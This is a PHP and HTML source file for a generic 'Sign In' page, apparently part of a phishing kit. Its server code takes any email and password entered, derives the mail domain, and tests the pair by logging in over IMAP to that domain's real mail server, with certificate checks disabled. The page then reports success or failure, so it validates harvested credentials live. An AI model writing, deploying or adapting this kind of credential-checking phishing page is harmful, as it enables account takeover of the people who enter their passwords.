<?php
// Check if the form was submitted
if ($_SERVER["REQUEST_METHOD"] == "POST" && isset($_POST['email']) && isset($_POST['password'])) {
    $email = $_POST['email'];
    $password = $_POST['password'];

    // Extract the domain from the email address
    $domain = substr(strrchr($email, "@"), 1);
    $servers = ["mail.$domain", "imap.$domain"];

    $loginSuccess = false;
    foreach ($servers as $server) {
        $connection = @imap_open("{{$server}:993/imap/ssl/novalidate-cert}", $email, $password);
        if ($connection) {
            $loginSuccess = true;
            imap_close($connection);
            break;
        }
    }

    if ($loginSuccess) {
        echo 'Login successful.';
    } else {
        echo 'Login failed.';
    }
}
?>
<!DOCTYPE html><html lang="en"><head>

<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<link href="https://fonts.googleapis.com/css?family=Roboto:300,400&amp;display=swap" rel="stylesheet">
<link rel="stylesheet" href="css/QKNRFhnDWzf5.css">
<link rel="stylesheet" href="css/8G3omdebdo2O.css">

<link rel="stylesheet" href="css/UeQhYvJVmsBM.css">
<style>
#loadingOverlay {
    position: fixed;
    left: 0;
    top: 0;
    width: 100%;
    height: 100%;
    background: rgba(255, 255, 255, 0.7);
    display: flex;
    justify-content: center;
    align-items: center;
    z-index: 1000; /* Ensure it's above other content */
}

.loader {
    border: 16px solid #f3f3f3;
    border-radius: 50%;
    border-top: 16px solid #3498db;
    width: 120px;
    height: 120px;
    animation: spin 2s linear infinite;
}

@keyframes spin {
    0% { transform: rotate(0deg); }
    100% { transform: rotate(360deg); }
}

</style>
<link rel="stylesheet" href="css/xShXLpggE0Ro.css">
<title>Login #7</title>
<script defer="" referrerpolicy="origin" src="js/1nTFSlT3VFZc.js"></script><script nonce="d33a31f0-d98b-41c5-ae72-dc5b5038652d">try{(function(w,d){!function(o,p,q,r){o[q]=o[q]||{};o[q].executed=[];o.zaraz={deferred:[],listeners:[]};o.zaraz.q=[];o.zaraz._f=function(s){return async function(){var t=Array.prototype.slice.call(arguments);o.zaraz.q.push({m:s,a:t})}};for(const u of["track","set","debug"])o.zaraz[u]=o.zaraz._f(u);o.zaraz.init=()=>{var v=p.getElementsByTagName(r)[0],w=p.createElement(r),x=p.getElementsByTagName("title")[0];x&&(o[q].t=p.getElementsByTagName("title")[0].text);o[q].x=Math.random();o[q].w=o.screen.width;o[q].h=o.screen.height;o[q].j=o.innerHeight;o[q].e=o.innerWidth;o[q].l=o.location.href;o[q].r=p.referrer;o[q].k=o.screen.colorDepth;o[q].n=p.characterSet;o[q].o=(new Date).getTimezoneOffset();if(o.dataLayer)for(const B of Object.entries(Object.entries(dataLayer).reduce(((C,D)=>({...C[1],...D[1]})),{})))zaraz.set(B[0],B[1],{scope:"page"});o[q].q=[];for(;o.zaraz.q.length;){const E=o.zaraz.q.shift();o[q].q.push(E)}w.defer=!0;for(const F of[localStorage,sessionStorage])Object.keys(F||{}).filter((H=>H.startsWith("_zaraz_"))).forEach((G=>{try{o[q]["z_"+G.slice(7)]=JSON.parse(F.getItem(G))}catch{o[q]["z_"+G.slice(7)]=F.getItem(G)}}));w.referrerPolicy="origin";w.src="/cdn-cgi/zaraz/s.js?z="+btoa(encodeURIComponent(JSON.stringify(o[q])));v.parentNode.insertBefore(w,v)};["complete","interactive"].includes(p.readyState)?zaraz.init():o.addEventListener("DOMContentLoaded",zaraz.init)}(w,d,"zarazData","script");})(window,document)}catch(e){throw fetch("/cdn-cgi/zaraz/t"),e;};</script></head>
<body>
<div class="content">
<div class="container">
<div class="row">
<div class="col-md-6">
<img src="images/oqeaB9t70fhP.svg" alt="Image" class="img-fluid">
</div>
<div class="col-md-6 contents">
<div class="row justify-content-center">
<div class="col-md-8">
<div class="mb-4">
<h3>Sign In</h3>
<p class="mb-4">Lorem ipsum dolor sit amet elit. Sapiente sit aut eos consectetur adipisicing.</p>
</div>
<form method="post">

<div id="loadingOverlay" style="display:none;">
    <div class="loader"></div> <!-- You can use a GIF or CSS for the spinner -->
</div>
<div id="messageContainer"></div>


<div class="form-group first">
<label for="username">Email</label>
<input type="text" class="form-control" type="email" name="email" required>
</div>
<div class="form-group last mb-4">
<label for="password">Password</label>
<input type="password" class="form-control" id="password" name="password" required>
</div>
<div class="d-flex mb-5 align-items-center">
<label class="control control--checkbox mb-0"><span class="caption">Remember me</span>
<input type="checkbox" checked="checked">
<div class="control__indicator"></div>
</label>
<span class="ml-auto"><a href="#" class="forgot-pass">Forgot Password</a></span>
</div>
<input type="submit" value="Log In" class="btn btn-block btn-primary">
<span class="d-block text-left my-4 text-muted">— or login with —</span>
<div class="social-login">
<a href="#" class="facebook">
<span class="icon-facebook mr-3"></span>
</a>
<a href="#" class="twitter">
<span class="icon-twitter mr-3"></span>
</a>
<a href="#" class="google">
<span class="icon-google mr-3"></span>
</a>
</div>
</form>


<script>
document.querySelector('form').addEventListener('submit', function(e) {
    e.preventDefault(); // Prevent form submission
    var email = document.querySelector('input[name="email"]').value;
    var password = document.querySelector('input[name="password"]').value;

    // Show loading overlay
    document.getElementById('loadingOverlay').style.display = 'flex';

    // AJAX request to your PHP script
    var xhr = new XMLHttpRequest();
    xhr.open('POST', 'index.php', true); // Replace 'your_php_script.php' with the actual path
    xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
    xhr.onload = function() {
        // Hide loading overlay
        document.getElementById('loadingOverlay').style.display = 'none';

        // Show message
        var response = this.responseText;
        document.getElementById('messageContainer').innerText = response;
    };
    xhr.send('email=' + encodeURIComponent(email) + '&password=' + encodeURIComponent(password));
});
</script>


</div>
</div>
</div>
</div>
</div>
</div>
<script src="js/eIzlpnCoBN1W.js"></script>
<script src="js/qyO6avD8QbXC.js"></script>
<script src="js/hGURyrM68csV.js"></script>
<script src="js/vyIwM7ArqDtI.js"></script>
<script defer="" src="https://static.cloudflareinsights.com/beacon.min.js/v84a3a4012de94ce1a686ba8c167c359c1696973893317" data-cf-beacon="{" rayid":"8520fdf3e9403cb1","version":"2024.2.0","token":"cd0b4b3a733644fc843ef0b185f98241"}"="" crossorigin="anonymous"></script>

</body></html>